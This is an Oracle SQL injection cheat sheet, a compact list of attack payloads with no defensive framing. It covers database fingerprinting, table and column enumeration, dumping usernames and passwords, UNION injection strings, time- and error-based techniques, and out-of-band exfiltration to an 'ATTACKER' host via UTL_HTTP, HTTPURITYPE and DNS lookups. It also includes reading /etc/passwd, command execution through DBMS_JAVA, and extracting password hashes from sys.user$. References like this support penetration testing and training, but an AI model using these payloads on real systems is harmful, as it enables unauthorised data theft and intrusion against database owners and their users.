Identification
SELECT banner FROM v$version
SELECT version FROM v$instance
-- Comment: -- or /* */
-- String concat: 'a'||'b'
-- Every SELECT needs FROM → use FROM dual
SELECT user FROM dual
SELECT ora_database_name FROM dual
SELECT SYS_CONTEXT('USERENV','DB_NAME') FROM dual
SELECT SYS_CONTEXT('USERENV','HOST') FROM dual
SELECT SYS_CONTEXT('USERENV','IP_ADDRESS') FROM dual
Enumerate Tables
SELECT table_name FROM all_tables
SELECT table_name FROM user_tables
SELECT table_name FROM all_tables WHERE owner='SCHEMA'
Enumerate Columns
SELECT column_name FROM all_tab_columns WHERE table_name='USERS'
SELECT column_name FROM user_tab_columns WHERE table_name='USERS'
Oracle folds unquoted identifiers to uppercase and stores them that way in the data dictionary, so table and column names in these lookups are case-sensitive and should be given in uppercase (e.g. 'USERS') unless the object was created with a quoted mixed-case name.
Dump Data
SELECT username||':'||password FROM users
SELECT LISTAGG(username||':'||password, ',') WITHIN GROUP (ORDER BY username) FROM users
String Functions
| Function | Description |
|---|---|
| `\|\|` | Concatenate |
| `SUBSTR(str,pos,len)` | Substring |
| `LENGTH(str)` | String length |
| `ASCII(char)` | ASCII value |
| `CHR(n)` | Char from ASCII |
| `UPPER(str)` | Uppercase |
| `LOWER(str)` | Lowercase |
| `REPLACE(str,old,new)` | Replace |
| `INSTR(str,sub)` | Find substring position |
| `TRIM(str)` | Trim whitespace |
| `TO_CHAR(n)` | Number to string |
| `RAWTOHEX(str)` | Hex encode |
Conditional
CASE WHEN condition THEN true_val ELSE false_val END
DECODE(expr, search, result, default)
Time Delay
DBMS_PIPE.RECEIVE_MESSAGE('a', 5) -- 5 sec delay
-- In WHERE clause:
AND 1=DBMS_PIPE.RECEIVE_MESSAGE('a',5)
-- Via heavy query (no privileges needed):
AND (SELECT COUNT(*) FROM all_users t1, all_users t2, all_users t3) > 0
Error-Based
UTL_INADDR.GET_HOST_ADDRESS((QUERY))
CTXSYS.DRITHSX.SN(1,(QUERY))
UNION Specifics
Oracle requires:
- Same number of columns
- Compatible types
- `FROM dual` for dummy values
' UNION SELECT NULL,NULL,NULL FROM dual-- -
' UNION SELECT username,password,NULL FROM users-- -
OOB — HTTP
SELECT UTL_HTTP.REQUEST('http://ATTACKER/?d='||(SELECT user FROM dual)) FROM dual
SELECT HTTPURITYPE('http://ATTACKER/?d='||(SELECT user FROM dual)).GETCLOB() FROM dual
OOB — DNS
SELECT UTL_INADDR.GET_HOST_ADDRESS((SELECT user FROM dual)||'.ATTACKER.com') FROM dual
File Read
-- Via UTL_FILE (needs directory object)
CREATE DIRECTORY ext AS '/etc';
SELECT UTL_FILE.FOPEN('EXT','passwd','r') FROM dual;
Java (If Enabled)
SELECT DBMS_JAVA.RUNJAVA('oracle.aurora.util.Wrapper /bin/cat /etc/passwd') FROM dual
RCE — Java
-- Requires CREATE PROCEDURE + JAVA privileges
SELECT DBMS_JAVA.RUNJAVA('oracle.aurora.util.Wrapper /bin/id') FROM dual
No LIMIT — Use ROWNUM
SELECT * FROM (SELECT username, ROWNUM r FROM users) WHERE r=1 -- First row
SELECT * FROM (SELECT username, ROWNUM r FROM users) WHERE r=2 -- Second row
Password Hashes
SELECT name, password FROM sys.user$ -- DBA only
SELECT username, password FROM dba_users -- DBA only
Stacked Queries
Not supported in the standard SQL injection context: Oracle does not accept semicolon-separated statements in a single SQL call, so an injected query cannot be followed by a second statement.
Privileges
SELECT * FROM session_privs
SELECT * FROM user_role_privs
SELECT * FROM dba_sys_privs WHERE grantee='USER'
Sources